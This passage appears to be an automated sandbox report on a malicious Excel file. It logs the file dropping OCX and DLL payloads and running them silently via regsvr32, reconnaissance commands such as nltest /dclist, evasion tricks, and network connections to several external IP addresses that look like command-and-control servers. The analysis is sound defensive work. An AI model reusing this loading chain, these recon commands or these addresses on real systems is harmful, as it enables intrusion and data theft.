Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\hhwe2.ocx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\hhwe3.ocx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\hhwe4.ocx Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\OajQanYCSHcPg\quNy.dll" Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\HUWZaq\zHqsrrqpZcTdGFR.dll" Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /all Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\nltest.exe nltest /dclist: Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32 Jump to behavior
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\hhwe3.ocx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR53AB.tmp Jump to behavior
Source: AA40.tmp.10.dr Binary string: Boot Device: \Device\HarddiskVolume1
Source: classification engine Classification label: mal100.troj.expl.evad.winXLS@20/15@4/67
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF9134170 CoCreateInstance,CoTaskMemFree, 7_2_000007FEF9134170
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: MG72133243812OR.xls OLE indicator, Workbook stream: true
Source: MG72133243812OR.xls.0.dr OLE indicator, Workbook stream: true
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000BA00 CreateToolhelp32Snapshot,Process32NextW,Process32FirstW,CloseHandle, 7_2_000000018000BA00
Source: C:\Windows\System32\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: MG72133243812OR.xls Initial sample: OLE indicators vbamacros = False
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF91AB098 push rcx; retf 7_2_000007FEF91AB099
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF754B098 push rcx; retf 9_2_000007FEF754B099
Source: nQd2n6798wQuOjZR7TtNgQ[1].dll.0.dr Static PE information: section name: _RDATA
Source: BYH56Vb[1].dll.0.dr Static PE information: section name: _RDATA
Source: hhwe3.ocx.0.dr Static PE information: section name: _RDATA
Source: hhwe4.ocx.0.dr Static PE information: section name: _RDATA
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\OajQanYCSHcPg\quNy.dll"

Persistence and Installation Behavior

barindex
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\HUWZaq\zHqsrrqpZcTdGFR.dll (copy) Jump to dropped file
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\OajQanYCSHcPg\quNy.dll (copy) Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\hhwe4.ocx Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\nQd2n6798wQuOjZR7TtNgQ[1].dll Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\BYH56Vb[1].dll Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\hhwe3.ocx Jump to dropped file
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\HUWZaq\zHqsrrqpZcTdGFR.dll (copy) Jump to dropped file
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\OajQanYCSHcPg\quNy.dll (copy) Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\hhwe4.ocx Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\hhwe3.ocx Jump to dropped file

Boot Survival

barindex
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\hhwe4.ocx Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\hhwe3.ocx Jump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\regsvr32.exe File opened: C:\Windows\system32\OajQanYCSHcPg\quNy.dll:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\System32\regsvr32.exe File opened: C:\Windows\system32\HUWZaq\zHqsrrqpZcTdGFR.dll:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapter
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BIOS
Source: C:\Windows\System32\regsvr32.exe TID: 2652 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 500 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 1460 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 2020 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Windows\System32\ipconfig.exe TID: 868 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\nQd2n6798wQuOjZR7TtNgQ[1].dll Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\BYH56Vb[1].dll Jump to dropped file
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Windows\System32\regsvr32.exe API coverage: 6.7 %
Source: C:\Windows\System32\regsvr32.exe API coverage: 6.7 %
Source: C:\Windows\System32\regsvr32.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF916C310 FindFirstFileExW, 7_2_000007FEF916C310
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF916C7EC FindFirstFileExW,FindNextFileW,FindClose,FindClose, 7_2_000007FEF916C7EC
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF916BB54 _invalid_parameter_noinfo,_invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 7_2_000007FEF916BB54
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF916BB54 _invalid_parameter_noinfo,_invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 7_2_000007FEF916BB54
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000FEDC FindNextFileW,FindFirstFileW, 8_2_000000018000FEDC
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF750BB54 _invalid_parameter_noinfo,_invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 9_2_000007FEF750BB54
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF750BB54 _invalid_parameter_noinfo,_invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 9_2_000007FEF750BB54
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF750C7EC FindFirstFileExW,FindNextFileW,FindClose,FindClose, 9_2_000007FEF750C7EC
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF750C310 FindFirstFileExW, 9_2_000007FEF750C310
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018000FEDC FindNextFileW,FindFirstFileW, 10_2_000000018000FEDC
Source: C:\Windows\System32\regsvr32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\regsvr32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF917F184 IsDebuggerPresent,OutputDebugStringW, 7_2_000007FEF917F184
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF916F128 GetProcessHeap, 7_2_000007FEF916F128
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF913A41C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_000007FEF913A41C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF914A8A8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_000007FEF914A8A8
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF913ADB8 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_000007FEF913ADB8
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF913AF9C SetUnhandledExceptionFilter, 7_2_000007FEF913AF9C
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF74DAF9C SetUnhandledExceptionFilter, 9_2_000007FEF74DAF9C
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF74DADB8 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_000007FEF74DADB8
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF74EA8A8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_000007FEF74EA8A8
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF74DA41C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_000007FEF74DA41C

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\System32\regsvr32.exe Network Connect: 172.105.226.75 8080 Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Network Connect: 138.197.68.35 8080 Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Network Connect: 139.162.113.169 8080 Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Network Connect: 144.91.78.55 443 Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Network Connect: 135.148.6.80 443 Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\OajQanYCSHcPg\quNy.dll" Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\HUWZaq\zHqsrrqpZcTdGFR.dll" Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /all Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\nltest.exe nltest /dclist: Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW, 7_2_000007FEF9172204
Source: C:\Windows\System32\regsvr32.exe Code function: EnumSystemLocalesW, 7_2_000007FEF9172550
Source: C:\Windows\System32\regsvr32.exe Code function: EnumSystemLocalesW, 7_2_000007FEF91725D4
Source: C:\Windows\System32\regsvr32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 7_2_000007FEF9172764
Source: C:\Windows\System32\regsvr32.exe Code function: EnumSystemLocalesW, 7_2_000007FEF91726A4
Source: C:\Windows\System32\regsvr32.exe Code function: GetLocaleInfoW, 7_2_000007FEF91729B0
Source: C:\Windows\System32\regsvr32.exe Code function: GetLocaleInfoW, 7_2_000007FEF9172BDC
Source: C:\Windows\System32\regsvr32.exe Code function: GetLocaleInfoW, 7_2_000007FEF9166BD8
Source: C:\Windows\System32\regsvr32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 7_2_000007FEF9172B08
Source: C:\Windows\System32\regsvr32.exe Code function: EnumSystemLocalesW, 7_2_000007FEF9165D78
Source: C:\Windows\System32\regsvr32.exe Code function: EnumSystemLocalesW, 7_2_000007FEF9165E00
Source: C:\Windows\System32\regsvr32.exe Code function: EnumSystemLocalesW, 7_2_000007FEF9165CCC
Source: C:\Windows\System32\regsvr32.exe Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 7_2_000007FEF9172D08
Source: C:\Windows\System32\regsvr32.exe Code function: EnumSystemLocalesW, 9_2_000007FEF7505D78
Source: C:\Windows\System32\regsvr32.exe Code function: EnumSystemLocalesW, 9_2_000007FEF7505E00
Source: C:\Windows\System32\regsvr32.exe Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 9_2_000007FEF7512D08
Source: C:\Windows\System32\regsvr32.exe Code function: EnumSystemLocalesW, 9_2_000007FEF7505CCC
Source: C:\Windows\System32\regsvr32.exe Code function: GetLocaleInfoW, 9_2_000007FEF7506BD8
Source: C:\Windows\System32\regsvr32.exe Code function: GetLocaleInfoW, 9_2_000007FEF7512BDC
Source: C:\Windows\System32\regsvr32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 9_2_000007FEF7512B08
Source: C:\Windows\System32\regsvr32.exe Code function: GetLocaleInfoW, 9_2_000007FEF75129B0
Source: C:\Windows\System32\regsvr32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 9_2_000007FEF7512764
Source: C:\Windows\System32\regsvr32.exe Code function: EnumSystemLocalesW, 9_2_000007FEF75126A4
Source: C:\Windows\System32\regsvr32.exe Code function: EnumSystemLocalesW, 9_2_000007FEF7512550
Source: C:\Windows\System32\regsvr32.exe Code function: EnumSystemLocalesW, 9_2_000007FEF75125D4
Source: C:\Windows\System32\regsvr32.exe Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW, 9_2_000007FEF7512204
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF917FD30 cpuid 7_2_000007FEF917FD30
Source: C:\Windows\System32\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF913A7D0 Concurrency::cancel_current_task,GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 7_2_000007FEF913A7D0

Stealing of Sensitive Information

barindex
Source: Yara match File source: 0000000A.00000002.1758141495.000000000021A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1758179314.00000000003CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 10.3.regsvr32.exe.34e0108.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.regsvr32.exe.4e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.regsvr32.exe.34ffb40.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.regsvr32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.regsvr32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.regsvr32.exe.4e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.regsvr32.exe.2110000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.regsvr32.exe.34ffb40.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.regsvr32.exe.2110000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.regsvr32.exe.150000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.regsvr32.exe.150000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.regsvr32.exe.4d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.regsvr32.exe.4d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.regsvr32.exe.34e0108.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000003.1631224520.00000000034D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1478954467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1487067523.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1758289138.00000000004D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1478774301.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1758111807.0000000000150000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1486455282.00000000001C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1758759626.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1758703624.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.1685880314.0000000002110000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs